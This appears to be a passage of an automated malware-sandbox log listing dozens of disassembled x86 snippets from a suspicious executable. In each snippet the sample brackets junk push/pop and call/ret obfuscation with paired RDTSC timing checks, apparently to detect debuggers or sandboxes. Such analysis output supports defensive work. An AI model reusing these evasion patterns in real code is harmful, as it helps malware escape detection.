Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CFFC44 second address: CFFCC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+1245A6E1h], ecx 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007F0D5D4BD018h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e call 00007F0D5D4BD027h 0x00000033 xor dword ptr [ebp+122D2767h], edi 0x00000039 pop edi 0x0000003a push eax 0x0000003b pushad 0x0000003c push ecx 0x0000003d jmp 00007F0D5D4BD023h 0x00000042 pop ecx 0x00000043 js 00007F0D5D4BD01Ch 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D02BFF second address: D02C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D03292 second address: D03298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D03298 second address: D0329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D041F5 second address: D041FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D05231 second address: D05246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0D5D345976h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D05246 second address: D05263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D5D4BD028h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D06232 second address: D06237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D06237 second address: D062D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F0D5D4BD018h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 js 00007F0D5D4BD016h 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f call 00007F0D5D4BD018h 0x00000034 pop edx 0x00000035 mov dword ptr [esp+04h], edx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc edx 0x00000042 push edx 0x00000043 ret 0x00000044 pop edx 0x00000045 ret 0x00000046 jbe 00007F0D5D4BD01Ch 0x0000004c mov ebx, dword ptr [ebp+122D36AEh] 0x00000052 push 00000000h 0x00000054 or dword ptr [ebp+12479A88h], ecx 0x0000005a clc 0x0000005b xchg eax, esi 0x0000005c jnl 00007F0D5D4BD020h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 pushad 0x00000067 popad 0x00000068 jmp 00007F0D5D4BD027h 0x0000006d popad 0x0000006e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0746F second address: D074F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jns 00007F0D5D345985h 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F0D5D345978h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a call 00007F0D5D345984h 0x0000002f mov edi, 18A7C9DBh 0x00000034 pop ebx 0x00000035 push 00000000h 0x00000037 sub di, 0BE8h 0x0000003c push 00000000h 0x0000003e call 00007F0D5D345986h 0x00000043 pop ebx 0x00000044 je 00007F0D5D34597Ch 0x0000004a mov ebx, dword ptr [ebp+122D384Ah] 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D074F6 second address: D074FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0442F second address: D04439 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0D5D34597Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D04439 second address: D04446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0851B second address: D08520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D08520 second address: D08533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D4BD01Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D08533 second address: D08537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0641A second address: D064A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F0D5D4BD025h 0x0000000c jmp 00007F0D5D4BD01Fh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov dword ptr [ebp+1245A235h], esi 0x0000001b push dword ptr fs:[00000000h] 0x00000022 jp 00007F0D5D4BD022h 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f mov dword ptr [ebp+12463FB3h], eax 0x00000035 mov eax, dword ptr [ebp+122D0CD1h] 0x0000003b mov dword ptr [ebp+12477100h], ecx 0x00000041 push FFFFFFFFh 0x00000043 push 00000000h 0x00000045 push ebp 0x00000046 call 00007F0D5D4BD018h 0x0000004b pop ebp 0x0000004c mov dword ptr [esp+04h], ebp 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc ebp 0x00000059 push ebp 0x0000005a ret 0x0000005b pop ebp 0x0000005c ret 0x0000005d mov edi, 1433C6B9h 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D08537 second address: D085B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F0D5D345978h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D27F2h], eax 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0D5D345978h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000019h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 xor dword ptr [ebp+122D2AB9h], edi 0x0000004d mov dword ptr [ebp+122D18A3h], edi 0x00000053 push 00000000h 0x00000055 mov dword ptr [ebp+124630FCh], edi 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F0D5D345986h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D085B7 second address: D085BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D064A2 second address: D064BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0D5D345983h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D085BB second address: D085C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D085C1 second address: D085E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D085E3 second address: D085E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0772E second address: D07734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0A720 second address: D0A731 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D5D4BD018h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0A731 second address: D0A737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0A737 second address: D0A73F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0A73F second address: D0A7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F0D5D345978h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 call 00007F0D5D345978h 0x0000002b pop ecx 0x0000002c mov dword ptr [esp+04h], ecx 0x00000030 add dword ptr [esp+04h], 00000019h 0x00000038 inc ecx 0x00000039 push ecx 0x0000003a ret 0x0000003b pop ecx 0x0000003c ret 0x0000003d sub dword ptr [ebp+122D25A0h], eax 0x00000043 push 00000000h 0x00000045 pushad 0x00000046 mov bl, E7h 0x00000048 mov ecx, edx 0x0000004a popad 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d pushad 0x0000004e jp 00007F0D5D345976h 0x00000054 pushad 0x00000055 popad 0x00000056 popad 0x00000057 jbe 00007F0D5D34597Ch 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0A7A8 second address: D0A7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0A7B4 second address: D0A7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0A7B8 second address: D0A7C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD01Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0A95B second address: D0A961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0A961 second address: D0A965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0C7B6 second address: D0C7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0C7BA second address: D0C7C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0C7C0 second address: D0C836 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c adc ebx, 35130C34h 0x00000012 cmc 0x00000013 popad 0x00000014 push 00000000h 0x00000016 mov bx, 0758h 0x0000001a jmp 00007F0D5D345981h 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D360Ah] 0x00000027 mov ebx, dword ptr [ebp+122D2BE5h] 0x0000002d xchg eax, esi 0x0000002e pushad 0x0000002f jmp 00007F0D5D345988h 0x00000034 jmp 00007F0D5D34597Ch 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F0D5D345982h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0D873 second address: D0D879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0E7BC second address: D0E834 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0D5D345978h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F0D5D345978h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov di, D35Fh 0x0000002d mov ebx, 3114735Bh 0x00000032 push 00000000h 0x00000034 sbb bx, 6F5Eh 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F0D5D345978h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 0000001Ch 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 jno 00007F0D5D34597Bh 0x0000005b mov bx, di 0x0000005e push eax 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 push edx 0x00000063 pop edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0E834 second address: D0E842 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007F0D5D4BD016h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0DA6D second address: D0DA98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jmp 00007F0D5D345986h 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F0D5D345978h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0DA98 second address: D0DAA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F0D5D4BD016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D0FA08 second address: D0FA0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D146F3 second address: D146F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D146F7 second address: D14703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D17D86 second address: D17D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D17D8E second address: D17DAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345984h 0x00000007 jne 00007F0D5D345976h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D17DAC second address: D17DB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CB75AC second address: CB75C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F0D5D34597Dh 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CB75C1 second address: CB75E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D4BD01Ah 0x00000009 jmp 00007F0D5D4BD029h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CB75E8 second address: CB75EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CB75EC second address: CB75F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CB75F5 second address: CB7623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 jmp 00007F0D5D345989h 0x0000000e jmp 00007F0D5D34597Ah 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D17615 second address: D1761A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D1E164 second address: D1E168 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D1E168 second address: D1E17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jo 00007F0D5D4BD024h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D1E17D second address: D1E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D1E181 second address: D1E193 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F0D5D4BD018h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D1E193 second address: D1E1CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D345989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0D5D345984h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D22AC2 second address: D22ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F0D5D4BD016h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D22C26 second address: D22C2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D22DAC second address: D22DB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D22DB2 second address: D22DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D22DB8 second address: D22DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D27516 second address: D2751B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2751B second address: D27521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D27521 second address: D27529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D27529 second address: D2752F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2752F second address: D27535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D27535 second address: D2754E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F0D5D4BD01Ch 0x0000000f ja 00007F0D5D4BD016h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2754E second address: D27554 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CAD3C9 second address: CAD3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: CAD3CD second address: CAD3D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2BFA4 second address: D2BFCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D5D4BD020h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0D5D4BD021h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2BFCB second address: D2BFE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D5D345986h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2BFE5 second address: D2BFE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C153 second address: D2C173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F0D5D345987h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	RDTSC instruction interceptor: First address: D2C173 second address: D2C179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
